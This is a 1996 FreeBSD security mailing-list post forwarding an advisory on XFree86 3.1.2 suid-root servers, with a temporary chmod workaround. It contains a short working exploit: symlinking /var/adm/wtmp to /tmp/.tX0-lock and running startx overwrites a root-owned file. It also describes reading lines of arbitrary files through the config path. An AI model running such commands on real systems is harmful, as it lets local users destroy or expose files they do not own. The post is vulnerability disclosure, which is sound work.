From owner-freebsd-security Mon Jan 29 11:45:06 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id LAA25550 for security-outgoing; Mon, 29 Jan 1996 11:45:06 -0800 (PST) Received: from passer.osg.gov.bc.ca (passer.osg.gov.bc.ca [142.32.110.29]) by freefall.freebsd.org (8.7.3/8.7.3) with ESMTP id LAA25510 for ; Mon, 29 Jan 1996 11:44:45 -0800 (PST) Received: from localhost (localhost [127.0.0.1]) by passer.osg.gov.bc.ca (8.7.3/8.6.10) with SMTP id LAA11338 for freebsd-security@freebsd.org; Mon, 29 Jan 1996 11:44:35 -0800 (PST) From: Cy Schubert - BCSC Open Systems Group Message-Id: <199601291944.LAA11338@passer.osg.gov.bc.ca> X-Authentication-Warning: passer.osg.gov.bc.ca: Host localhost [127.0.0.1] didn't use HELO protocol Reply-to: cschuber@orca.gov.bc.ca X-Mailer: DXmail To: freebsd-security@freebsd.org Subject: XFree86 3.1.2 Security Problems Date: Mon, 29 Jan 96 11:44:35 -0800 X-Mts: smtp Sender: owner-security@freebsd.org Precedence: bulk I just recieved this from another security news group. I haven't had a chance to verify this under FreeBSD (at home), however I have no reason to believe that this wouldn't affect FreeBSD as well. Would anyone be willing to comment on this? Regards, Phone: (604)389-3827 Cy Schubert OV/VM: BCSC02(CSCHUBER) Open Systems Support BITNET: CSCHUBER@BCSC02.BITNET BC Systems Corp. Internet: cschuber@uumail.gov.bc.ca cschuber@bcsc02.gov.bc.ca "Quit spooling around, JES do it." ------- Forwarded Message There are security holes in XFree86 3.1.2, which installs its servers as suid root (/usr/X11R6/bin/XF86_*). When reading and writing files, it does not take proper precautions to ensure that file permissions are maintained, resulting in the ability to overwrite files, and to read limited portions of other files. The first problem stems from the server opening a temporary file, /tmp/.tX0-lock with mode (O_WRONLY|O_CREAT|O_TRUNC). By making this file a symlink, the server will overwrite the original file, and then write to it its current pid. Other problems exist in the server relating to similar problems, one such example is the ability to specify an arbitrary file for the XF86config file which will then be opened, and the first line that fails to match the expected format will be output with an error, allowing a line to be read from an arbitrary file. Program: XFree86 3.1.2 servers Affected Operating Systems: All systems with XFree86 3.1.2 installed Requirements: account on system Temporary Patch: chmod o-x /usr/X11R6/bin/XF86* Security Compromise: overwrite arbitrary files Author: Dave M. (davem@cmu.edu) Synopsis: While running suid root, XFree86 servers do not properly check file permissions, allowing a user to overwrite arbitrary files on a system. Exploit: $ ls -l /var/adm/wtmp - -rw-r--r-- 1 root root 174104 Dec 30 08:31 /var/adm/wtmp $ ln -s /var/adm/wtmp /tmp/.tX0-lock $ startx (At this point exit X if it started, or else ignore any error messages) $ ls -l /var/adm/wtmp - -r--r--r-- 1 root root 11 Dec 30 08:33 /var/adm/wtmp /-------------\ |David Meltzer| |davem@cmu.edu| /--------------------------\ |School of Computer Science| |Carnegie Mellon University| \--------------------------/ ------- End of Forwarded Message